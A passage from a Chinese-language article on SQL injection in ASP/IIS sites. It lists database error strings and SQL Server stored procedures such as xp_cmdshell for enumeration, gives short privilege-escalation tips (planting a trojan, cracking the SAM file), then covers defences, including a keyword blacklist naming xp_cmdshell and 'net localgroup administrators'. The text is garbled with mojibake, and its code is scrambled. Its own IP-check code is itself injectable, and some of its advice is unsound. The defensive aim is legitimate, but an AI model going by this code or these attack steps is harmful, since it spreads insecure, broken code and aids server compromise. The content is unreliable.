OSBC,ASP Microsoft OLE DB Provider for odbc Driver error ‘80040e21’
ODBC ,C# [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
.NET Stack Tracer:
[SqlException:ORA-01722:invalid number]
Oracle,JDBC SQLException:ORA-01722:incalid number
ColdFusion Invalid data for CFSQLTYPE
MySQL,PHP Warning:mysql_errno():supplied argument is not a valid MySQL
PostgreSQL,Perl Warning:PostgreSQL query failed
有助于枚舉系統(tǒng)信息的存儲(chǔ)過(guò)程
存儲(chǔ)過(guò)程 描述
sp_columns<table> 返回一個(gè)表的字段名
sp_configure[name] 返回內(nèi)部數(shù)據(jù)庫(kù)設(shè)置
sp_dboption 參看用戶個(gè)人配置的數(shù)據(jù)庫(kù)選項(xiàng)
sp_depends<object> 列出與一個(gè)存儲(chǔ)過(guò)程相關(guān)的表
sp_helptext<object> 描述對(duì)象�。對(duì)識(shí)別可執(zhí)行存儲(chǔ)過(guò)程的區(qū)域更有用。
sp_helpextendedproc 列出所有的擴(kuò)展存儲(chǔ)過(guò)程
sp_spaceused[object] 返回?cái)?shù)據(jù)庫(kù)基本信息
sp_who2[username] 顯示用戶名�、已連接的主機(jī)、用于連接數(shù)據(jù)庫(kù)的應(yīng)用程序�����、當(dāng)前在這sp_who 個(gè)數(shù)據(jù)庫(kù)中執(zhí)行的命令���,以及其他信息����。
不需要參數(shù)的擴(kuò)展存儲(chǔ)過(guò)程
存儲(chǔ)過(guò)程 描述
xp_loginconfig 顯示登錄信息,特別是登錄模式(混和等等)和默認(rèn)登錄
xp_logininfo 顯示當(dāng)前登錄的賬號(hào)�,支隊(duì)NTLM賬號(hào)適用
xp_msver 列出SQL版本和平臺(tái)信息
xp_enumdsn 枚舉ODBC數(shù)據(jù)源
xp_enumgroups 枚舉Windows組
xp_ntsec_enumdomains 枚舉網(wǎng)絡(luò)上存在的域
需要參數(shù)的存儲(chǔ)過(guò)程
存儲(chǔ)過(guò)程 描述
xp_cmdshell<command> 等同于cmd.exe
xp_regread<rootkey>,<key>,<service> 讀取一個(gè)注冊(cè)表的值
xp_reg* 這里有一些其他注冊(cè)表相關(guān)的存儲(chǔ)過(guò)程,讀取值是最有用的
xp_servicecontrol<action>,<service> 啟動(dòng)或停止一個(gè)Windows服務(wù)
xp_terminate_process<PID> 基于進(jìn)程ID殺掉一個(gè)進(jìn)程
3.1.9����、得到系統(tǒng)的管理員權(quán)限
ASP木馬只有USER權(quán)限,要想獲取對(duì)系統(tǒng)的完全控制����,還要有系統(tǒng)的管理員權(quán)限。怎么辦����?提升權(quán)限的方法有很多種: 上傳木馬,修改開(kāi)機(jī)自動(dòng)運(yùn)行的.ini文件�����;復(fù)制CMD.exe到scripts�,人為制造UNICODE漏洞;下載SAM文件�����,破解并獲取OS的所有用戶名密碼; 等等��,視系統(tǒng)的具體情況而定�����,可以采取不同的方法�����。
3.2防注入
通過(guò)增強(qiáng)服務(wù)器安全配置和將一些適當(dāng)?shù)倪^(guò)濾代碼或跳轉(zhuǎn)帶面添加到asp或html或php或cgi里面都可以����。如下面的可加入top.asp文件中開(kāi)頭
3.2.1 常用的檢測(cè)技術(shù)
SQL注入攻擊檢測(cè)分為入侵前的檢測(cè)和入侵后的檢測(cè)��,入侵前的檢測(cè)�,可以通過(guò)手工方式,也可以使用SQL注入工具軟件��。檢測(cè)的目的是為預(yù)防SQL注入攻擊��,而對(duì)于SQL注入攻擊后的檢測(cè)����,主要是針對(duì)日志的檢測(cè)�����,SQL注入攻擊成功后�����,會(huì)在IIS日志和數(shù)據(jù)庫(kù)中留下“痕跡”�����。
一��、數(shù)據(jù)庫(kù)檢查
使用HDSI�、NBSI等SQL注入攻擊軟件工具進(jìn)行SQL注入攻擊后����,都會(huì)在數(shù)據(jù)庫(kù)中生成一些臨時(shí)表。通過(guò)查看數(shù)據(jù)庫(kù)中最近新建的表的結(jié)構(gòu)和內(nèi)容����,可以判斷是否曾經(jīng)發(fā)生過(guò)SQL注入攻擊。
二����、IIS日志檢查
在Web服務(wù)器中如果啟用了日志記錄�,則IIS日志會(huì)記錄訪問(wèn)者的IP地址��,訪問(wèn)文件等信息����,SQL注入攻擊往往會(huì)大量訪問(wèn)某一個(gè)頁(yè)面文件(存在SQL注入點(diǎn)的動(dòng)態(tài)網(wǎng)頁(yè)),日志文件會(huì)急劇增加�,通過(guò)查看日志文件的大小以及日志文件中的內(nèi)容,也可以判斷是否發(fā)生過(guò)SQL注入攻擊�����。
三����、其它相關(guān)信息判斷
SQL注入攻擊成功后�,入侵者往往會(huì)添加用戶、開(kāi)放3389遠(yuǎn)程終端服務(wù)以及安裝木馬后門等���,可以通過(guò)查看系統(tǒng)管理員賬號(hào)�、遠(yuǎn)程終端服務(wù)器開(kāi)啟情況��、系統(tǒng)最近日期產(chǎn)生的一些文件等信息來(lái)判斷是否發(fā)生過(guò)入侵�。
四�����、使用Linq技術(shù)進(jìn)行防護(hù)
Ling是一種新的數(shù)據(jù)存取技術(shù)�。LINQtoSQL在專用于數(shù)據(jù)存取時(shí)��,清除了SQL注入存在于你的應(yīng)用程序中的可能性�����,原因很簡(jiǎn)單:LINQ代表你執(zhí)行的每次查詢都加上了具體的參數(shù)��。在LINQ從你植入的查詢語(yǔ)句中構(gòu)建SQL查詢時(shí)����,無(wú)論源自何處,提交給查詢的任何輸入都被當(dāng)作字面值�。
3.2.2 通過(guò)服務(wù)器安全配置防注入
一、服務(wù)器優(yōu)化
由于SQL注入是根據(jù)ASP服務(wù)器(Internet Information Server�,IIS)給出的錯(cuò)誤提示信息入侵的,攻擊者們總是通過(guò)錯(cuò)誤信息判斷是否存在SQL注入���,并獲得進(jìn)一步入侵?jǐn)?shù)據(jù)庫(kù)的信息�,故把IIS設(shè)置為只給出一種錯(cuò)誤提示信息,即http 500錯(cuò)誤�,這樣,無(wú)論ASP運(yùn)行中出任何錯(cuò)誤�,服務(wù)器都不暴露任何錯(cuò)誤消息。同時(shí)���,設(shè)置網(wǎng)站的執(zhí)行權(quán)限為“純腳本”�,對(duì)于通過(guò)網(wǎng)站后臺(tái)管理中心上傳的存放文件的目錄���,執(zhí)行權(quán)限均設(shè)為“無(wú)”���,這樣,即使網(wǎng)站被上傳了木馬也運(yùn)行不了����。另外,不啟用網(wǎng)站的父路徑���,禁用不必要的服務(wù)器擴(kuò)展。還要在SQL Server中刪除xp_cmdshell�、xp_reg*、xp_servicecontrol�、sp_oa*等不經(jīng)常使用而有帶有一定危險(xiǎn)性的擴(kuò)展存儲(chǔ)過(guò)程。專門建立僅具有滿足最低權(quán)限要求的賬號(hào)進(jìn)行數(shù)據(jù)庫(kù)查詢�����。對(duì)數(shù)據(jù)庫(kù)用戶的權(quán)限也要進(jìn)行嚴(yán)格區(qū)分。
二��、配置數(shù)據(jù)庫(kù)用戶權(quán)限
數(shù)據(jù)庫(kù)用戶的權(quán)限配置采用最小權(quán)限原則���。比如:連接到數(shù)據(jù)庫(kù)的用戶只給訪問(wèn)數(shù)據(jù)庫(kù)的最低權(quán)限���,一定不能具有sa級(jí)別的權(quán)限;對(duì)于不需要進(jìn)行操作的表�����,只保留表的只讀權(quán)限���;對(duì)于不需要訪問(wèn)的表����,則連訪問(wèn)權(quán)限也去掉��;為數(shù)據(jù)庫(kù)不同類型的操作使用不同級(jí)別的用戶權(quán)限���。同時(shí)���,去掉SQLServer中的一些擴(kuò)展存儲(chǔ)過(guò)程�,比如xp_cmdshell���,因?yàn)槿肭终呖赏ㄟ^(guò)它擁有系統(tǒng)管理員權(quán)限�,用來(lái)執(zhí)行系統(tǒng)的任意命令��,從而控制整個(gè)服務(wù)器系統(tǒng)��。
3.2.3 通過(guò)跳轉(zhuǎn)來(lái)防注入
方法一:
<%if session("username"="" or session("userkey"="" then
response.redirect "../../"
end if%>
(說(shuō)明:只要有用戶注入則跳轉(zhuǎn)到../../目錄)
方法二:
<%
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER")
server_v2=Cstr(Request.ServerVariables("SERVER_NAME")
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450>"
response.write "<tr><td style=“font:9pt Verdana“>"
response.write "你提交的路徑有誤��,禁止從站點(diǎn)外部提交數(shù)據(jù)�,請(qǐng)不要亂該參數(shù)!"
response.write "</td></tr></table></center>"
response.end
end if
%>
(說(shuō)明:只要有用戶注入則判斷為外部連接哦)
方法三:
<% dim From_url,Serv_url
From_url = Cstr(Request.ServerVariables("HTTP_REFERER")
Serv_url = Cstr(Request.ServerVariables("SERVER_NAME")
if mid(From_url,8,len(Serv_url)) <> Serv_url then
response.write "NO"
response.redirect("../")
response.end
end if%>
(說(shuō)明:只要有用戶注入則跳轉(zhuǎn)到../(這個(gè)可以改為其它網(wǎng)站����,或其它頁(yè)面,給它們一點(diǎn)小的警告也行哦)目錄)����。
3.2.4 通過(guò)過(guò)濾非法代碼防注入
一�、變量參數(shù)類型的檢查若變量參數(shù)是數(shù)字型的,盡量用id=CLng(Request("id"))強(qiáng)制轉(zhuǎn)換類型;若是字符串型的��,則要過(guò)濾掉一些特殊字符����,比如單引號(hào),雙引號(hào)��,分號(hào)��,逗號(hào)�,冒號(hào),連接號(hào)等��;如:
id=replace(replace(replace(replace(replace(replace(replace(trim(Request("id")),"'",""),"*",""),"?",""),"(",""),")",""),"<",""),".","")
二����、變量范圍的檢查若變量為數(shù)字型的,要嚴(yán)格限制變量的輸入范圍��,防止數(shù)據(jù)的溢出���。在代碼中增加on error resume next語(yǔ)句���,讓ASP程序在出錯(cuò)的情況下也不報(bào)錯(cuò)�。
三����、編寫通用代碼過(guò)濾SQL語(yǔ)句的特殊字符SQL語(yǔ)句執(zhí)行前要過(guò)濾掉"exec、insert����、select、update���、count�、user�����、xp_cmdshell���、add���、Asc"等用于注入的常用字符。通用代碼為:
dim Sql_Get
dim sql_injdata
Sql_Get=lcase(str)
‘定義
SQL_injdata="'|;|and|cast|exec|insert|select|delete%20from|updat
e|count|*|%|chr|mid|master|truncate|char|declare|drop%20table|from|net%20user|xp_cmdshell|/add|net%20localgroup%20administrators|Asc|char"SQL_inj=split(SQL_Injdata,"|")
‘get請(qǐng)求中的注入攔截
If Request.QueryString<>""Then
For Each SQL_Get In Request.QueryString
For Sql_Index=0 To Ubound(SQL_inj)
if
instr(Request.QueryString(SQL_Get),Sql_inj(Sql_Index))>0 Then
Response.Write"<Script
Language=javascript>alert('請(qǐng)不要在參數(shù)中包含非法字符!');history.back(-1)</Script>"
Response.end
end if
next
Next
End If
‘form請(qǐng)求中的注入攔截
If Request.form<>""Then
For Each SQL_Get In Request.form
For Sql_Index=0 To Ubound(SQL_inj)
if instr(Request.form(SQL_Get),Sql_inj (Sql_Index))>0 Then
Response.Write"<Script Language=javascript>alert('請(qǐng)不要在參數(shù)中包含非法字符!');history.back(-1)</Script>"
Response.end
end if
next
Next
End If
‘cookies請(qǐng)求中的注入攔截
If Request.cookies<>""Then
For Each SQL_Get In Request.cookies
For Sql_Index=0 To Ubound(SQL_inj)
if instr(Request.cookies(SQL_Get),Sql_Inj(Sql_Index))>0 Then
Response.Write"<Script
Language=javascript>alert('請(qǐng)不要在參數(shù)中包含非法字符!');history.back(-1)</Script>"
Response.end
end if
next
Next
End If
由于Request是ASP的一個(gè)內(nèi)部對(duì)象���,用于獲取HTTP請(qǐng)求中傳遞的任意信息�,常用來(lái)獲得get方式提交的數(shù)據(jù)(Request.QueryString)、表單post提交的數(shù)據(jù)(Request.Form)和cookies請(qǐng)求中提交的數(shù)據(jù)(Cookies Request.Cookies)���,所以只要在程序中過(guò)濾所有post、get或cookies請(qǐng)求中參數(shù)信息的非法字符����,即可防范SQL注入攻擊。
除此之外�,程序員應(yīng)對(duì)存放在數(shù)據(jù)庫(kù)中的用戶密碼進(jìn)行加密操作,比如用MD5加密�����。由于MD5沒(méi)有反向算法�����,不能解密�����,加密后密碼以亂碼形式顯示,無(wú)法識(shí)別����,可提高ASP網(wǎng)站的安全性。
3.2.5 SQL注入攻擊通用檢驗(yàn)?zāi)P?a target="_blank" class="ed_inner_link" style="text-decoration: none; color: rgb(0, 102, 204); white-space: nowrap; ">優(yōu)化設(shè)計(jì)
在原有SQL注入攻擊的“檢測(cè)��、防御�����、備案”模型基礎(chǔ)上�����,去掉設(shè)置復(fù)雜��、效果不明顯的客戶端設(shè)置�,而只采用服務(wù)器端檢驗(yàn),對(duì)檢驗(yàn)出來(lái)的惡意攻擊者進(jìn)行備案��,記錄下攻擊者IP�、首次攻擊時(shí)間、最后一次攻擊時(shí)間�����、攻擊次數(shù)等信息��,為防止攻擊者窮舉攻擊�����,本模型還可自由設(shè)置攻擊次數(shù)達(dá)多少次的用戶的請(qǐng)求,服務(wù)器將直接不予以理會(huì)���,直接報(bào)錯(cuò)提示.此外本模型以獨(dú)立.a(chǎn)sp文件形式存在,使用時(shí)僅需要在需要使用SQL注入攻擊檢驗(yàn)的頁(yè)面最開(kāi)始位置加入一行代碼<?����。ncludeFile="./IPcheck.a(chǎn)sp"-->引用即可���,使用�、功能設(shè)置都極為方便.對(duì)應(yīng)模型簡(jiǎn)圖如圖2所示. "
"圖3
程序使用到的主要變量有ClientURL�,ParamArray,ParamDinamicArray����,i,DealMethod�����,ErrorReturn�����,strFilter,
AttackLimitNum�,ClientIP,sql���,核心代碼段如下:
<%
SubIpCheckIn
sql="select*fromIP_Attackwhereip="&ClientIP&""
CallconnCreate(conn)
CallrstSearchCreate(conn���,rs,sql)
If rs.recordcount<0Then庫(kù)中無(wú)此IP�����,攻擊者第一次攻擊
sql="insertintoIP_Attack(ip����,firstTime,lastTime)
values("&ClientIP&"�,"&now()&","&now()&")"
conn.execute(sql)
Else庫(kù)中有此IP���,將攻擊者攻擊次數(shù)加1�,最后攻擊時(shí)間置為當(dāng)前時(shí)間
sql="updateIP_AttacksetlastTime="&now()&",
attackNum=attackNum+1whereip="&ClientIP&""
conn.execute(sql)
Endif
CallrstClose(rs)
CallconnClose(conn)
EndSub
?。瓕?shí)現(xiàn)對(duì)用戶傳遞參數(shù)的檢驗(yàn)----
sql="selectattackNumfromIP_Attackwhereip="&ClientIP&""
CallconnCreate(conn)
CallrstSearchCreate(conn,rs�����,sql)
If rs.recordcount>0andrs.fields(0)>AttackNum Then
Response.Write("<ScriptLanguage=JavaScript>aler(t你提交非法字符數(shù)超過(guò)"&AttackLimitNum&"��!服務(wù)器不予響應(yīng)�����,請(qǐng)與管理員聯(lián)系)��;</Script>")
Response.End
Else當(dāng)用戶沒(méi)有攻擊過(guò)���,或者攻擊次數(shù)還沒(méi)達(dá)到最大限制數(shù)時(shí)
ClientURL=Request.ServerVariables("QUERY_STRING")取得傳遞過(guò)來(lái)的URL信息
ParamArray=spli(tClientURL,"&")
RedimParamDinamicArray(ubound(ParamArray))
For i=0toUbound(ParamArray)
ParamDinamicArray(i)=Lef(tParamArray(i)�,inst(rParamArray(i),"=")-1)
Next
For i=0toUbound(ParamDinamicArray)在此FOR循環(huán)中對(duì)每個(gè)參數(shù)值進(jìn)行比較
If ParamDinamicArray(i)<>""Then
If CheckSt(rCst(rParamDinamicArray(i)))Then
?����。鶕?jù)客戶選擇值分情況報(bào)錯(cuò)處理--
Call IPCheckIn
Response.End
EndIf
EndIf
Next
Endif
?���。ィ?br> 3.2.6結(jié)語(yǔ)
SQL注入問(wèn)題是綜合性安全問(wèn)題�,網(wǎng)站開(kāi)發(fā)人員只有在做好服務(wù)器安全工作的基礎(chǔ)上���,通過(guò)網(wǎng)站編程的細(xì)節(jié)堵塞SQL的漏洞����,才能有效地防范SQL注入����,提高網(wǎng)站的安全性。
|
